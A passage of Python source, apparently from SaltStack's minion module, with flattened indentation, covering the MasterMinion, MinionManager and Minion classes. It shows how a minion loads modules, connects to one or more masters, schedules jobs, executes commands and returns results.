self.rend = salt.loader.render(self.opts, self.functions)
# self.matcher = Matcher(self.opts, self.functions)
self.matchers = salt.loader.matchers(self.opts)
self.functions['sys.reload_modules'] = self.gen_modules
self.executors = salt.loader.executors(self.opts)
class MasterMinion(object):
'''
Create a fully loaded minion function object for generic use on the
master. What makes this class different is that the pillar is
omitted, otherwise everything else is loaded cleanly.
'''
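# A rough usage sketch (the opts source is an assumption; passing False for
# a flag simply skips loading that subsystem, per __init__ below):
#
#     import salt.config
#     import salt.minion
#     opts = salt.config.master_config('/etc/salt/master')
#     mminion = salt.minion.MasterMinion(opts, states=False, rend=False)
#     mminion.functions['test.ping']()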
def __init__(
self,
opts,
returners=True,
states=True,
rend=True,
matcher=True,
whitelist=None,
ignore_config_errors=True):
self.opts = salt.config.minion_config(
opts['conf_file'],
ignore_config_errors=ignore_config_errors,
role='master'
)
self.opts.update(opts)
self.whitelist = whitelist
self.opts['grains'] = salt.loader.grains(opts)
self.opts['pillar'] = {}
self.mk_returners = returners
self.mk_states = states
self.mk_rend = rend
self.mk_matcher = matcher
self.gen_modules(initial_load=True)
def gen_modules(self, initial_load=False):
'''
Tell the minion to reload the execution modules
CLI Example:
.. code-block:: bash
salt '*' sys.reload_modules
'''
self.utils = salt.loader.utils(self.opts)
self.functions = salt.loader.minion_mods(
self.opts,
utils=self.utils,
whitelist=self.whitelist,
initial_load=initial_load)
self.serializers = salt.loader.serializers(self.opts)
if self.mk_returners:
self.returners = salt.loader.returners(self.opts, self.functions)
if self.mk_states:
self.states = salt.loader.states(self.opts,
self.functions,
self.utils,
self.serializers)
if self.mk_rend:
self.rend = salt.loader.render(self.opts, self.functions)
if self.mk_matcher:
self.matchers = salt.loader.matchers(self.opts)
self.functions['sys.reload_modules'] = self.gen_modules
class MinionManager(MinionBase):
'''
Create a multi-minion interface: this creates as many minions as are
defined in the master option and binds each minion object to its
respective master.
'''
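# Multi-master behaviour is driven by the minion config; an illustrative
# (assumed) example that would make this manager spawn two minions:
#
#     master:
#       - master1.example.com
#       - master2.example.com
#
# _spawn_minions() below creates one Minion object per listed master and
# connects each of them on this manager's shared IOLoop.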
def __init__(self, opts):
super(MinionManager, self).__init__(opts)
self.auth_wait = self.opts['acceptance_wait_time']
self.max_auth_wait = self.opts['acceptance_wait_time_max']
self.minions = []
self.jid_queue = []
install_zmq()
self.io_loop = ZMQDefaultLoop.current()
self.process_manager = ProcessManager(name='MultiMinionProcessManager')
self.io_loop.spawn_callback(self.process_manager.run, **{'asynchronous': True}) # Tornado backward compat
def __del__(self):
self.destroy()
def _bind(self):
# start up the event publisher, so we can see events during startup
self.event_publisher = salt.utils.event.AsyncEventPublisher(
self.opts,
io_loop=self.io_loop,
)
self.event = salt.utils.event.get_event('minion', opts=self.opts, io_loop=self.io_loop)
self.event.subscribe('')
self.event.set_event_handler(self.handle_event)
@tornado.gen.coroutine
def handle_event(self, package):
yield [minion.handle_event(package) for minion in self.minions]
def _create_minion_object(self, opts, timeout, safe,
io_loop=None, loaded_base_name=None,
jid_queue=None):
'''
Helper function to return the correct type of object
'''
return Minion(opts,
timeout,
safe,
io_loop=io_loop,
loaded_base_name=loaded_base_name,
jid_queue=jid_queue)
def _spawn_minions(self):
'''
Spawn all the coroutines which will sign in to masters
'''
masters = self.opts['master']
if (self.opts['master_type'] in ('failover', 'distributed')) or not isinstance(self.opts['master'], list):
masters = [masters]
for master in masters:
s_opts = copy.deepcopy(self.opts)
s_opts['master'] = master
s_opts['multimaster'] = True
minion = self._create_minion_object(s_opts,
s_opts['auth_timeout'],
False,
io_loop=self.io_loop,
loaded_base_name='salt.loader.{0}'.format(s_opts['master']),
jid_queue=self.jid_queue,
)
self.minions.append(minion)
self.io_loop.spawn_callback(self._connect_minion, minion)
@tornado.gen.coroutine
def _connect_minion(self, minion):
'''
Create a minion, and asynchronously connect it to a master
'''
last = 0 # time of the last sign-in attempt (0 means never)
auth_wait = minion.opts['acceptance_wait_time']
failed = False
while True:
try:
if minion.opts.get('beacons_before_connect', False):
minion.setup_beacons(before_connect=True)
if minion.opts.get('scheduler_before_connect', False):
minion.setup_scheduler(before_connect=True)
yield minion.connect_master(failed=failed)
minion.tune_in(start=False)
break
except SaltClientError as exc:
failed = True
log.error(
'Error while bringing up minion for multi-master. Is '
'master at %s responding?', minion.opts['master']
)
last = time.time()
if auth_wait < self.max_auth_wait:
auth_wait += self.auth_wait
yield tornado.gen.sleep(auth_wait) # TODO: log?
except Exception:
failed = True
log.critical(
'Unexpected error while connecting to %s',
minion.opts['master'], exc_info=True
)
# Multi Master Tune In
def tune_in(self):
'''
Bind to the masters
This loop will attempt to create connections to masters it hasn't yet
connected to; once the initial connection is made it is up to ZMQ to
handle reconnects (there is no API in Salt to query that state here)
'''
self._bind()
# Fire off all the minion coroutines
self._spawn_minions()
# serve forever!
self.io_loop.start()
@property
def restart(self):
for minion in self.minions:
if minion.restart:
return True
return False
def stop(self, signum):
for minion in self.minions:
minion.process_manager.stop_restarting()
minion.process_manager.send_signal_to_processes(signum)
# kill any remaining processes
minion.process_manager.kill_children()
minion.destroy()
def destroy(self):
for minion in self.minions:
minion.destroy()
class Minion(MinionBase):
'''
This class instantiates a minion, manages its connections to the
master(s), and loads all of the functions into the minion
'''
def __init__(self, opts, timeout=60, safe=True, loaded_base_name=None, io_loop=None, jid_queue=None): # pylint: disable=W0231
'''
Pass in the options dict
'''
# at this point the parent class does not yet know *which* master we will connect to
super(Minion, self).__init__(opts)
self.timeout = timeout
self.safe = safe
self._running = None
self.win_proc = []
self.loaded_base_name = loaded_base_name
self.connected = False
self.restart = False
# Flag meaning minion has finished initialization including first connect to the master.
# True means the Minion is fully functional and ready to handle events.
self.ready = False
self.jid_queue = [] if jid_queue is None else jid_queue
self.periodic_callbacks = {}
if io_loop is None:
install_zmq()
self.io_loop = ZMQDefaultLoop.current()
else:
self.io_loop = io_loop
# Warn if ZMQ < 3.2
if zmq:
if ZMQ_VERSION_INFO < (3, 2):
log.warning(
'You have a version of ZMQ less than ZMQ 3.2! There are '
'known connection keep-alive issues with ZMQ < 3.2 which '
'may result in loss of contact with minions. Please '
'upgrade your ZMQ!'
)
# Late setup of the opts grains, so we can log from the grains
# module. If this is a proxy, however, we need to init the proxymodule
# before we can get the grains. We do this for proxies in the
# post_master_init
if not salt.utils.platform.is_proxy():
self.opts['grains'] = salt.loader.grains(opts)
else:
if self.opts.get('beacons_before_connect', False):
log.warning(
'\'beacons_before_connect\' is not supported '
'for proxy minions. Setting to False'
)
self.opts['beacons_before_connect'] = False
if self.opts.get('scheduler_before_connect', False):
log.warning(
'\'scheduler_before_connect\' is not supported '
'for proxy minions. Setting to False'
)
self.opts['scheduler_before_connect'] = False
log.info('Creating minion process manager')
if self.opts['random_startup_delay']:
sleep_time = random.randint(0, self.opts['random_startup_delay'])
log.info(
'Minion sleeping for %s seconds due to configured '
'random_startup_delay between 0 and %s seconds',
sleep_time, self.opts['random_startup_delay']
)
time.sleep(sleep_time)
self.process_manager = ProcessManager(name='MinionProcessManager')
self.io_loop.spawn_callback(self.process_manager.run, **{'asynchronous': True})
# We don't have the proxy setup yet, so we can't start engines
# Engines need to be able to access __proxy__
if not salt.utils.platform.is_proxy():
self.io_loop.spawn_callback(salt.engines.start_engines, self.opts,
self.process_manager)
# Install the SIGINT/SIGTERM handlers if not done so far
if signal.getsignal(signal.SIGINT) is signal.SIG_DFL:
# No custom signal handling was added, install our own
signal.signal(signal.SIGINT, self._handle_signals)
if signal.getsignal(signal.SIGTERM) is signal.SIG_DFL:
# No custom signal handling was added, install our own
signal.signal(signal.SIGTERM, self._handle_signals)
def _handle_signals(self, signum, sigframe): # pylint: disable=unused-argument
self._running = False
# escalate the signals to the process manager
self.process_manager.stop_restarting()
self.process_manager.send_signal_to_processes(signum)
# kill any remaining processes
self.process_manager.kill_children()
time.sleep(1)
sys.exit(0)
def sync_connect_master(self, timeout=None, failed=False):
'''
Block until we are connected to a master
'''
self._sync_connect_master_success = False
log.debug("sync_connect_master")
def on_connect_master_future_done(future):
self._sync_connect_master_success = True
self.io_loop.stop()
self._connect_master_future = self.connect_master(failed=failed)
# finish connecting to master
self._connect_master_future.add_done_callback(on_connect_master_future_done)
if timeout:
self.io_loop.call_later(timeout, self.io_loop.stop)
try:
self.io_loop.start()
except KeyboardInterrupt:
self.destroy()
# I made the following 3 line oddity to preserve traceback.
# Please read PR #23978 before changing, hopefully avoiding regressions.
# Good luck, we're all counting on you. Thanks.
if self._connect_master_future.done():
future_exception = self._connect_master_future.exception()
if future_exception:
# This needs to be re-raised to preserve restart_on_error behavior.
raise six.reraise(*future_exception)
if timeout and self._sync_connect_master_success is False:
raise SaltDaemonNotRunning('Failed to connect to the salt-master')
@tornado.gen.coroutine
def connect_master(self, failed=False):
'''
Return a future which will complete when you are connected to a master
'''
master, self.pub_channel = yield self.eval_master(self.opts, self.timeout, self.safe, failed)
yield self._post_master_init(master)
# TODO: better name...
@tornado.gen.coroutine
def _post_master_init(self, master):
'''
Function to finish init after connecting to a master
This is primarily loading modules, pillars, etc. (since they need
to know which master they connected to)
If this function is changed, please check ProxyMinion._post_master_init
to see if those changes need to be propagated.
Minions and ProxyMinions need significantly different post master setups,
which is why the differences are not factored out into separate helper
functions.
'''
if self.connected:
self.opts['master'] = master
# Initialize pillar before loader to make pillar accessible in modules
self.opts['pillar'] = yield salt.pillar.get_async_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['saltenv'],
pillarenv=self.opts.get('pillarenv')
).compile_pillar()
if not self.ready:
self._setup_core()
elif self.connected and self.opts['pillar']:
# The pillar has changed due to the connection to the master.
# Reload the functions so that they can use the new pillar data.
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
if hasattr(self, 'schedule'):
self.schedule.functions = self.functions
self.schedule.returners = self.returners
if not hasattr(self, 'schedule'):
self.schedule = salt.utils.schedule.Schedule(
self.opts,
self.functions,
self.returners,
cleanup=[master_event(type='alive')])
# add default scheduling jobs to the minion's scheduler
if self.opts['mine_enabled'] and 'mine.update' in self.functions:
self.schedule.add_job({
'__mine_interval':
{
'function': 'mine.update',
'minutes': self.opts['mine_interval'],
'jid_include': True,
'maxrunning': 2,
'run_on_start': True,
'return_job': self.opts.get('mine_return_job', False)
}
}, persist=True)
log.info('Added mine.update to scheduler')
else:
self.schedule.delete_job('__mine_interval', persist=True)
# add master_alive job if enabled
if (self.opts['transport'] != 'tcp' and
self.opts['master_alive_interval'] > 0 and
self.connected):
self.schedule.add_job({
master_event(type='alive', master=self.opts['master']):
{
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
}, persist=True)
if self.opts['master_failback'] and \
'master_list' in self.opts and \
self.opts['master'] != self.opts['master_list'][0]:
self.schedule.add_job({
master_event(type='failback'):
{
'function': 'status.ping_master',
'seconds': self.opts['master_failback_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master_list'][0]}
}
}, persist=True)
else:
self.schedule.delete_job(master_event(type='failback'), persist=True)
else:
self.schedule.delete_job(master_event(type='alive', master=self.opts['master']), persist=True)
self.schedule.delete_job(master_event(type='failback'), persist=True)
def _prep_mod_opts(self):
'''
Returns a copy of the opts with key bits stripped out
'''
mod_opts = {}
for key, val in six.iteritems(self.opts):
if key == 'logger':
continue
mod_opts[key] = val
return mod_opts
def _load_modules(self, force_refresh=False, notify=False, grains=None):
'''
Return the functions and the returners loaded up from the loader
module
'''
# if this is a *nix system AND modules_max_memory is set, let's enforce
# a memory limit on module imports
# this feature ONLY works on *nix-like OSes (the resource module doesn't work on Windows)
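# For example (illustrative value), a minion config containing
#
#     modules_max_memory: 524288000
#
# would cap the address space available while importing modules at roughly
# the process's current RSS + VMS plus 500 MiB, via RLIMIT_AS below.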
modules_max_memory = False
if self.opts.get('modules_max_memory', -1) > 0 and HAS_PSUTIL and HAS_RESOURCE:
log.debug(
'modules_max_memory set, enforcing a maximum of %s',
self.opts['modules_max_memory']
)
modules_max_memory = True
old_mem_limit = resource.getrlimit(resource.RLIMIT_AS)
rss, vms = psutil.Process(os.getpid()).memory_info()[:2]
mem_limit = rss + vms + self.opts['modules_max_memory']
resource.setrlimit(resource.RLIMIT_AS, (mem_limit, mem_limit))
elif self.opts.get('modules_max_memory', -1) > 0:
if not HAS_PSUTIL:
log.error('Unable to enforce modules_max_memory because psutil is missing')
if not HAS_RESOURCE:
log.error('Unable to enforce modules_max_memory because resource is missing')
# This might be a proxy minion
if hasattr(self, 'proxy'):
proxy = self.proxy
else:
proxy = None
if grains is None:
self.opts['grains'] = salt.loader.grains(self.opts, force_refresh, proxy=proxy)
self.utils = salt.loader.utils(self.opts, proxy=proxy)
if self.opts.get('multimaster', False):
s_opts = copy.deepcopy(self.opts)
functions = salt.loader.minion_mods(s_opts, utils=self.utils, proxy=proxy,
loaded_base_name=self.loaded_base_name, notify=notify)
else:
functions = salt.loader.minion_mods(self.opts, utils=self.utils, notify=notify, proxy=proxy)
returners = salt.loader.returners(self.opts, functions, proxy=proxy)
errors = {}
if '_errors' in functions:
errors = functions['_errors']
functions.pop('_errors')
# we're done, reset the limits!
if modules_max_memory is True:
resource.setrlimit(resource.RLIMIT_AS, old_mem_limit)
executors = salt.loader.executors(self.opts, functions, proxy=proxy)
return functions, returners, errors, executors
def _send_req_sync(self, load, timeout):
if self.opts['minion_sign_messages']:
log.trace('Signing event to be published onto the bus.')
minion_privkey_path = os.path.join(self.opts['pki_dir'], 'minion.pem')
sig = salt.crypt.sign_message(minion_privkey_path, salt.serializers.msgpack.serialize(load))
load['sig'] = sig
channel = salt.transport.Channel.factory(self.opts)
return channel.send(load, timeout=timeout)
@tornado.gen.coroutine
def _send_req_async(self, load, timeout):
if self.opts['minion_sign_messages']:
log.trace('Signing event to be published onto the bus.')
minion_privkey_path = os.path.join(self.opts['pki_dir'], 'minion.pem')
sig = salt.crypt.sign_message(minion_privkey_path, salt.serializers.msgpack.serialize(load))
load['sig'] = sig
channel = salt.transport.client.AsyncReqChannel.factory(self.opts)
ret = yield channel.send(load, timeout=timeout)
raise tornado.gen.Return(ret)
def _fire_master(self, data=None, tag=None, events=None, pretag=None, timeout=60, sync=True, timeout_handler=None):
'''
Fire an event on the master, or drop the message if unable to send.
'''
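# Sketches of how this is invoked elsewhere in this module:
#
#     self._fire_master('ping', 'minion_ping', sync=False)
#     self._fire_master(events=beacons)
#
# With data/tag a single event is built; with events= a list of pre-built
# events is forwarded as-is.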
load = {'id': self.opts['id'],
'cmd': '_minion_event',
'pretag': pretag,
'tok': self.tok}
if events:
load['events'] = events
elif data and tag:
load['data'] = data
load['tag'] = tag
elif not data and tag:
load['data'] = {}
load['tag'] = tag
else:
return
if sync:
try:
self._send_req_sync(load, timeout)
except salt.exceptions.SaltReqTimeoutError:
log.info('fire_master failed: master could not be contacted. Request timed out.')
# very likely one of the masters is dead, status.master will flush it
self.functions['status.master'](self.opts['master'])
return False
except Exception:
log.info('fire_master failed: %s', traceback.format_exc())
return False
else:
if timeout_handler is None:
def handle_timeout(*_):
log.info('fire_master failed: master could not be contacted. Request timed out.')
# very likely one of the masters is dead, status.master will flush it
self.functions['status.master'](self.opts['master'])
return True
timeout_handler = handle_timeout
with tornado.stack_context.ExceptionStackContext(timeout_handler):
self._send_req_async(load, timeout, callback=lambda f: None) # pylint: disable=unexpected-keyword-arg
return True
@tornado.gen.coroutine
def _handle_decoded_payload(self, data):
'''
Override this method if you wish to handle the decoded data
differently.
'''
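# The decoded payload is a dict of job data; a rough sketch (values are
# assumptions) based on the fields used below:
#
#     {'fun': 'test.ping', 'arg': [], 'jid': '20190101000000000000',
#      'user': 'root', 'ret': ''}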
# Ensure payload is unicode. Disregard failure to decode binary blobs.
if six.PY2:
data = salt.utils.data.decode(data, keep=True)
if 'user' in data:
log.info(
'User %s Executing command %s with jid %s',
data['user'], data['fun'], data['jid']
)
else:
log.info(
'Executing command %s with jid %s',
data['fun'], data['jid']
)
log.debug('Command details %s', data)
# Don't duplicate jobs
log.trace('Started JIDs: %s', self.jid_queue)
if self.jid_queue is not None:
if data['jid'] in self.jid_queue:
return
else:
self.jid_queue.append(data['jid'])
if len(self.jid_queue) > self.opts['minion_jid_queue_hwm']:
self.jid_queue.pop(0)
if isinstance(data['fun'], six.string_types):
if data['fun'] == 'sys.reload_modules':
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
self.schedule.functions = self.functions
self.schedule.returners = self.returners
process_count_max = self.opts.get('process_count_max')
if process_count_max > 0:
process_count = len(salt.utils.minion.running(self.opts))
while process_count >= process_count_max:
log.warning("Maximum number of processes reached while executing jid {0}, waiting...".format(data['jid']))
yield tornado.gen.sleep(10)
process_count = len(salt.utils.minion.running(self.opts))
# We stash an instance reference to allow for the socket
# communication in Windows. You can't pickle functions, and thus
# python needs to be able to reconstruct the reference on the other
# side.
instance = self
multiprocessing_enabled = self.opts.get('multiprocessing', True)
if multiprocessing_enabled:
if sys.platform.startswith('win'):
# let python reconstruct the minion on the other side if we're
# running on windows
instance = None
with default_signals(signal.SIGINT, signal.SIGTERM):
process = SignalHandlingMultiprocessingProcess(
target=self._target, args=(instance, self.opts, data, self.connected)
)
else:
process = threading.Thread(
target=self._target,
args=(instance, self.opts, data, self.connected),
name=data['jid']
)
if multiprocessing_enabled:
with default_signals(signal.SIGINT, signal.SIGTERM):
# Reset current signals before starting the process in
# order not to inherit the current signal handlers
process.start()
else:
process.start()
# TODO: remove the windows specific check?
if multiprocessing_enabled and not salt.utils.platform.is_windows():
# we only want to join() immediately if we are daemonizing a process
process.join()
else:
self.win_proc.append(process)
def ctx(self):
'''
Return a single context manager for the minion's data
'''
if six.PY2:
return contextlib.nested(
self.functions.context_dict.clone(),
self.returners.context_dict.clone(),
self.executors.context_dict.clone(),
)
else:
exitstack = contextlib.ExitStack()
exitstack.enter_context(self.functions.context_dict.clone())
exitstack.enter_context(self.returners.context_dict.clone())
exitstack.enter_context(self.executors.context_dict.clone())
return exitstack
@classmethod
def _target(cls, minion_instance, opts, data, connected):
if not minion_instance:
minion_instance = cls(opts)
minion_instance.connected = connected
if not hasattr(minion_instance, 'functions'):
functions, returners, function_errors, executors = (
minion_instance._load_modules(grains=opts['grains'])
)
minion_instance.functions = functions
minion_instance.returners = returners
minion_instance.function_errors = function_errors
minion_instance.executors = executors
if not hasattr(minion_instance, 'serial'):
minion_instance.serial = salt.payload.Serial(opts)
if not hasattr(minion_instance, 'proc_dir'):
uid = salt.utils.user.get_uid(user=opts.get('user', None))
minion_instance.proc_dir = (
get_proc_dir(opts['cachedir'], uid=uid)
)
def run_func(minion_instance, opts, data):
if isinstance(data['fun'], tuple) or isinstance(data['fun'], list):
return Minion._thread_multi_return(minion_instance, opts, data)
else:
return Minion._thread_return(minion_instance, opts, data)
with tornado.stack_context.StackContext(functools.partial(RequestContext,
{'data': data, 'opts': opts})):
with tornado.stack_context.StackContext(minion_instance.ctx):
run_func(minion_instance, opts, data)
@classmethod
def _thread_return(cls, minion_instance, opts, data):
'''
This method should be used as a threading target; it starts the actual
minion-side execution.
'''
fn_ = os.path.join(minion_instance.proc_dir, data['jid'])
if opts['multiprocessing'] and not salt.utils.platform.is_windows():
# Shutdown the multiprocessing before daemonizing
salt.log.setup.shutdown_multiprocessing_logging()
salt.utils.process.daemonize_if(opts)
# Reconfigure multiprocessing logging after daemonizing
salt.log.setup.setup_multiprocessing_logging()
salt.utils.process.appendproctitle('{0}._thread_return {1}'.format(cls.__name__, data['jid']))
sdata = {'pid': os.getpid()}
sdata.update(data)
log.info('Starting a new job with PID %s', sdata['pid'])
with salt.utils.files.fopen(fn_, 'w+b') as fp_:
fp_.write(minion_instance.serial.dumps(sdata))
ret = {'success': False}
function_name = data['fun']
executors = data.get('module_executors') or \
getattr(minion_instance, 'module_executors', []) or \
opts.get('module_executors', ['direct_call'])
allow_missing_funcs = any([
minion_instance.executors['{0}.allow_missing_func'.format(executor)](function_name)
for executor in executors
if '{0}.allow_missing_func'.format(executor) in minion_instance.executors
])
if function_name in minion_instance.functions or allow_missing_funcs is True:
try:
minion_blackout_violation = False
if minion_instance.connected and minion_instance.opts['pillar'].get('minion_blackout', False):
whitelist = minion_instance.opts['pillar'].get('minion_blackout_whitelist', [])
# this minion is blacked out. Only allow saltutil.refresh_pillar and the whitelist
if function_name != 'saltutil.refresh_pillar' and function_name not in whitelist:
minion_blackout_violation = True
# use minion_blackout_whitelist from grains if it exists
if minion_instance.opts['grains'].get('minion_blackout', False):
whitelist = minion_instance.opts['grains'].get('minion_blackout_whitelist', [])
if function_name != 'saltutil.refresh_pillar' and function_name not in whitelist:
minion_blackout_violation = True
if minion_blackout_violation:
raise SaltInvocationError('Minion in blackout mode. Set \'minion_blackout\' '
'to False in pillar or grains to resume operations. Only '
'saltutil.refresh_pillar allowed in blackout mode.')
if function_name in minion_instance.functions:
func = minion_instance.functions[function_name]
args, kwargs = load_args_and_kwargs(
func,
data['arg'],
data)
else:
# only run if function_name is not in minion_instance.functions and allow_missing_funcs is True
func = function_name
args, kwargs = data['arg'], data
minion_instance.functions.pack['__context__']['retcode'] = 0
if isinstance(executors, six.string_types):
executors = [executors]
elif not isinstance(executors, list) or not executors:
raise SaltInvocationError("Wrong executors specification: {0}. String or non-empty list expected".
format(executors))
if opts.get('sudo_user', '') and executors[-1] != 'sudo':
executors[-1] = 'sudo' # replace the last one with sudo
log.trace('Executors list %s', executors) # pylint: disable=no-member
for name in executors:
fname = '{0}.execute'.format(name)
if fname not in minion_instance.executors:
raise SaltInvocationError("Executor '{0}' is not available".format(name))
return_data = minion_instance.executors[fname](opts, data, func, args, kwargs)
if return_data is not None:
break
if isinstance(return_data, types.GeneratorType):
ind = 0
iret = {}
for single in return_data:
if isinstance(single, dict) and isinstance(iret, dict):
iret.update(single)
else:
if not iret:
iret = []
iret.append(single)
tag = tagify([data['jid'], 'prog', opts['id'], six.text_type(ind)], 'job')
event_data = {'return': single}
minion_instance._fire_master(event_data, tag)
ind += 1
ret['return'] = iret
else:
ret['return'] = return_data
retcode = minion_instance.functions.pack['__context__'].get(
'retcode',
salt.defaults.exitcodes.EX_OK
)
if retcode == salt.defaults.exitcodes.EX_OK:
# No nonzero retcode in __context__ dunder. Check if return
# is a dictionary with a "result" or "success" key.
try:
func_result = all(return_data.get(x, True)
for x in ('result', 'success'))
except Exception:
# return data is not a dict
func_result = True
if not func_result:
retcode = salt.defaults.exitcodes.EX_GENERIC
ret['retcode'] = retcode
ret['success'] = retcode == salt.defaults.exitcodes.EX_OK
except CommandNotFoundError as exc:
msg = 'Command required for \'{0}\' not found'.format(
function_name
)
log.debug(msg, exc_info=True)
ret['return'] = '{0}: {1}'.format(msg, exc)
ret['out'] = 'nested'
ret['retcode'] = salt.defaults.exitcodes.EX_GENERIC
except CommandExecutionError as exc:
log.error(
'A command in \'%s\' had a problem: %s',
function_name, exc,
exc_info_on_loglevel=logging.DEBUG
)
ret['return'] = 'ERROR: {0}'.format(exc)
ret['out'] = 'nested'
ret['retcode'] = salt.defaults.exitcodes.EX_GENERIC
except SaltInvocationError as exc:
log.error(
'Problem executing \'%s\': %s',
function_name, exc,
exc_info_on_loglevel=logging.DEBUG
)
ret['return'] = 'ERROR executing \'{0}\': {1}'.format(
function_name, exc
)
ret['out'] = 'nested'
ret['retcode'] = salt.defaults.exitcodes.EX_GENERIC
except TypeError as exc:
msg = 'Passed invalid arguments to {0}: {1}\n{2}'.format(
function_name, exc, func.__doc__ or ''
)
log.warning(msg, exc_info_on_loglevel=logging.DEBUG)
ret['return'] = msg
ret['out'] = 'nested'
ret['retcode'] = salt.defaults.exitcodes.EX_GENERIC
except Exception:
msg = 'The minion function caused an exception'
log.warning(msg, exc_info_on_loglevel=True)
salt.utils.error.fire_exception(salt.exceptions.MinionError(msg), opts, job=data)
ret['return'] = '{0}: {1}'.format(msg, traceback.format_exc())
ret['out'] = 'nested'
ret['retcode'] = salt.defaults.exitcodes.EX_GENERIC
else:
docs = minion_instance.functions['sys.doc']('{0}*'.format(function_name))
if docs:
docs[function_name] = minion_instance.functions.missing_fun_string(function_name)
ret['return'] = docs
else:
ret['return'] = minion_instance.functions.missing_fun_string(function_name)
mod_name = function_name.split('.')[0]
if mod_name in minion_instance.function_errors:
ret['return'] += ' Possible reasons: \'{0}\''.format(
minion_instance.function_errors[mod_name]
)
ret['success'] = False
ret['retcode'] = salt.defaults.exitcodes.EX_GENERIC
ret['out'] = 'nested'
ret['jid'] = data['jid']
ret['fun'] = data['fun']
ret['fun_args'] = data['arg']
if 'master_id' in data:
ret['master_id'] = data['master_id']
if 'metadata' in data:
if isinstance(data['metadata'], dict):
ret['metadata'] = data['metadata']
else:
log.warning('The metadata parameter must be a dictionary. Ignoring.')
if minion_instance.connected:
minion_instance._return_pub(
ret,
timeout=minion_instance._return_retry_timer()
)
# Add default returners from minion config
# Should have been converted to a comma-delimited string already
if isinstance(opts.get('return'), six.string_types):
if data['ret']:
data['ret'] = ','.join((data['ret'], opts['return']))
else:
data['ret'] = opts['return']
log.debug('minion return: %s', ret)
# TODO: make a list? Seems odd to split it this late :/
if data['ret'] and isinstance(data['ret'], six.string_types):
if 'ret_config' in data:
ret['ret_config'] = data['ret_config']
if 'ret_kwargs' in data:
ret['ret_kwargs'] = data['ret_kwargs']
ret['id'] = opts['id']
for returner in set(data['ret'].split(',')):
try:
returner_str = '{0}.returner'.format(returner)
if returner_str in minion_instance.returners:
minion_instance.returners[returner_str](ret)
else:
returner_err = minion_instance.returners.missing_fun_string(returner_str)
log.error(
'Returner %s could not be loaded: %s',
returner_str, returner_err
)
except Exception as exc:
log.exception(
'The return failed for job %s: %s', data['jid'], exc
)
@classmethod
def _thread_multi_return(cls, minion_instance, opts, data):
'''
This method should be used as a threading target, start the actual
minion side execution.
'''
fn_ = os.path.join(minion_instance.proc_dir, data['jid'])
if opts['multiprocessing'] and not salt.utils.platform.is_windows():
# Shutdown the multiprocessing before daemonizing
salt.log.setup.shutdown_multiprocessing_logging()
salt.utils.process.daemonize_if(opts)
# Reconfigure multiprocessing logging after daemonizing
salt.log.setup.setup_multiprocessing_logging()
salt.utils.process.appendproctitle('{0}._thread_multi_return {1}'.format(cls.__name__, data['jid']))
sdata = {'pid': os.getpid()}
sdata.update(data)
log.info('Starting a new job with PID %s', sdata['pid'])
with salt.utils.files.fopen(fn_, 'w+b') as fp_:
fp_.write(minion_instance.serial.dumps(sdata))
multifunc_ordered = opts.get('multifunc_ordered', False)
num_funcs = len(data['fun'])
if multifunc_ordered:
ret = {
'return': [None] * num_funcs,
'retcode': [None] * num_funcs,
'success': [False] * num_funcs
}
else:
ret = {
'return': {},
'retcode': {},
'success': {}
}
for ind in range(0, num_funcs):
if not multifunc_ordered:
ret['success'][data['fun'][ind]] = False
try:
minion_blackout_violation = False
if minion_instance.connected and minion_instance.opts['pillar'].get('minion_blackout', False):
whitelist = minion_instance.opts['pillar'].get('minion_blackout_whitelist', [])
# this minion is blacked out. Only allow saltutil.refresh_pillar and the whitelist
if data['fun'][ind] != 'saltutil.refresh_pillar' and data['fun'][ind] not in whitelist:
minion_blackout_violation = True
elif minion_instance.opts['grains'].get('minion_blackout', False):
whitelist = minion_instance.opts['grains'].get('minion_blackout_whitelist', [])
if data['fun'][ind] != 'saltutil.refresh_pillar' and data['fun'][ind] not in whitelist:
minion_blackout_violation = True
if minion_blackout_violation:
raise SaltInvocationError('Minion in blackout mode. Set \'minion_blackout\' '
'to False in pillar or grains to resume operations. Only '
'saltutil.refresh_pillar allowed in blackout mode.')
func = minion_instance.functions[data['fun'][ind]]
args, kwargs = load_args_and_kwargs(
func,
data['arg'][ind],
data)
minion_instance.functions.pack['__context__']['retcode'] = 0
key = ind if multifunc_ordered else data['fun'][ind]
ret['return'][key] = func(*args, **kwargs)
retcode = minion_instance.functions.pack['__context__'].get(
'retcode',
0
)
if retcode == 0:
# No nonzero retcode in __context__ dunder. Check if return
# is a dictionary with a "result" or "success" key.
try:
func_result = all(ret['return'][key].get(x, True)
for x in ('result', 'success'))
except Exception:
# return data is not a dict
func_result = True
if not func_result:
retcode = 1
ret['retcode'][key] = retcode
ret['success'][key] = retcode == 0
except Exception as exc:
trb = traceback.format_exc()
log.warning('The minion function caused an exception: %s', exc)
if multifunc_ordered:
ret['return'][ind] = trb
else:
ret['return'][data['fun'][ind]] = trb
ret['jid'] = data['jid']
ret['fun'] = data['fun']
ret['fun_args'] = data['arg']
if 'metadata' in data:
ret['metadata'] = data['metadata']
if minion_instance.connected:
minion_instance._return_pub(
ret,
timeout=minion_instance._return_retry_timer()
)
if data['ret']:
if 'ret_config' in data:
ret['ret_config'] = data['ret_config']
if 'ret_kwargs' in data:
ret['ret_kwargs'] = data['ret_kwargs']
for returner in set(data['ret'].split(',')):
ret['id'] = opts['id']
try:
minion_instance.returners['{0}.returner'.format(
returner
)](ret)
except Exception as exc:
log.error(
'The return failed for job %s: %s',
data['jid'], exc
)
def _return_pub(self, ret, ret_cmd='_return', timeout=60, sync=True):
'''
Return the data from the executed command to the master server
'''
jid = ret.get('jid', ret.get('__jid__'))
fun = ret.get('fun', ret.get('__fun__'))
if self.opts['multiprocessing']:
fn_ = os.path.join(self.proc_dir, jid)
if os.path.isfile(fn_):
try:
os.remove(fn_)
except (OSError, IOError):
# The file is gone already
pass
log.info('Returning information for job: %s', jid)
log.trace('Return data: %s', ret)
if ret_cmd == '_syndic_return':
load = {'cmd': ret_cmd,
'id': self.opts['id'],
'jid': jid,
'fun': fun,
'arg': ret.get('arg'),
'tgt': ret.get('tgt'),
'tgt_type': ret.get('tgt_type'),
'load': ret.get('__load__')}
